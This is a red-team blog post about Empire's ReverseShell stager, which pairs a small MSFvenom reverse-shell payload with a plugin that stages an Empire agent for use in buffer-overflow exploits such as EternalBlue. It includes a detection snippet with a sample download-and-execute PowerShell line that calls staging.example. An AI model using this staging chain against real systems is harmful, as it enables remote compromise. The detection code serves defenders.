Today we wanted to cover one of the lesser-known functions in Empire, the ReverseShell stager. The name may not be the most intuitive, so stand by for a future name change, but this stager creates a minimal payload using MSFvenom to stage an Empire agent. Why would you need this? Well, in some instances you need a shellcode payload in the hundreds of kilobytes, but the best we can do for a standard Empire payload is just over a thousand, which isn't small enough for some of the buffer overflow vulnerabilities we want to exploit. So let's go through how we built this and what it does. For the walkthrough, we are using the Empire client, but Starkiller can also be used for all the steps.

ReverseShell Stager

The ReverseShell stager is generated the same way as other stagers: go to the usestager menu and select it with the command usestager windows/reverseshell. You will have to fill in all the normal fields, but most importantly, we added a spot for choosing the staging server (LocalHost and LocalPort). Even though these say local, you can set up a separate server, but that is a bit outside the scope of this blog.

All MSF formats are supported for the output file, even though only a few are in the drop-down menu, so feel free to try out some of the other MSFvenom formats (C, PowerShell, etc.) for your payloads. Just be sure to change the output file, since an executable may not be the most helpful format.

[Image: ReverseShell stager]

Under the hood, the stager simply generates a console command that is passed to msfvenom to create a shell_reverse_tcp payload. If you are interested in the source code, you can check it out here.

[Image: generated msfvenom command]

ReverseShell Server Plugin

Now that we have a launcher generated, we will need to start up our staging server. The MSF payload is going to act as a Stage 0 (well, technically a Stage -1, but let's just ignore that). The plugin captures the reverse shell from our MSFvenom payload and sends back a PowerShell one-liner that launches our Empire agent. This part is a bit more complicated, since it needs to be continuously listening. Alternatively, you could do all of this manually: have the shell call back to another machine and paste in a multi/launcher, but where is the fun in that?

The plugin comes pre-loaded in Empire, so you can load it with the command useplugin reverseshell_stager_server. The LocalHost and LocalPort should match the callback address that was used on the stager; otherwise, it listens on all interfaces by default. From this menu, you can generate a PowerShell agent with all the bypasses and obfuscation that you want, since we are no longer limited by the size of our payload.

[Image: ReverseShell server plugin]

For those of you interested in the source code, check out the plugin here.
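One consequence of this design is worth noting for detection: the raw TCP reverse shell carries the plugin's PowerShell one-liner in cleartext (the -enc argument is only base64, not encryption), unlike the encrypted staging Empire normally does over HTTP(S). The Python below is an added example, not code from this post or from the Empire project: it scans a constructed TCP payload for an encoded PowerShell launcher and decodes it so an analyst can see what the shell was told to run. The sample stream, the staging.example URL and the function name are assumptions made for this example.

```python
import base64
import re

# Constructed sample of what a raw TCP shell session might carry once the
# staging server answers: a prompt followed by a cleartext PowerShell
# one-liner with an encoded command. Not captured from Empire; built here.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://staging.example/launcher')"
SAMPLE_STREAM = (
    b"Microsoft Windows [Version 10.0.19044]\r\nC:\\Windows\\system32>"
    + b"powershell -noP -sta -w 1 -enc "
    + base64.b64encode(INNER.encode("utf-16-le"))
    + b"\r\n"
)

# powershell[.exe] ... -e/-en/-enc/-encodedcommand <base64 blob>
LAUNCHER_RE = re.compile(
    rb"powershell(?:\.exe)?[^\r\n]*?-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)


def find_encoded_launchers(stream: bytes) -> list:
    """Return each cleartext PowerShell -enc launcher found in a TCP payload,
    with its decoded command (PowerShell encodes -enc as UTF-16LE base64)."""
    hits = []
    for m in LAUNCHER_RE.finditer(stream):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; skip rather than crash
        lowered = decoded.lower()
        hits.append({
            "offset": m.start(),
            "decoded": decoded,
            # download-and-execute is the pattern a staging one-liner shows
            "downloads": "downloadstring" in lowered or "iex" in lowered,
        })
    return hits


if __name__ == "__main__":
    for hit in find_encoded_launchers(SAMPLE_STREAM):
        print(f"offset {hit['offset']}: downloads={hit['downloads']}")
        print("  decoded:", hit["decoded"])
```

The same check can be run over reassembled TCP streams from a sensor; an encoded PowerShell launcher arriving over a plain socket rather than HTTP(S) is the tell for this Stage -1 path.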

Success

Once the plugin is running, it will wait for the payload to be executed and then send the Empire agent. If everything was configured properly, you should see the following message in your client, and SUCCESS! You have an Empire agent staged using MSFvenom.

[Image: agent check-in]

There are quite a few different uses for this type of stager, the most important being that it offers a way to create a minimally sized piece of shellcode. We have used this type of payload in the past to create payloads to launch with EternalBlue and SMBGhost. Hopefully, this post helps others doing development or staging payloads for other CVEs you may want to use.

Our team is prepping a release of Empire 5.0, which will include some amazing new features and integrate Starkiller into your web browser. Currently, our alpha is closed to sponsors, but follow us on Twitter to see when the open beta announcement happens.

If you enjoyed this walkthrough and want to learn more, we are offering an Evasion Course that will teach advanced techniques to defeat defenders at Blackhat USA 2022.


The post Empire <3 MSFvenom appeared first on BC Security.
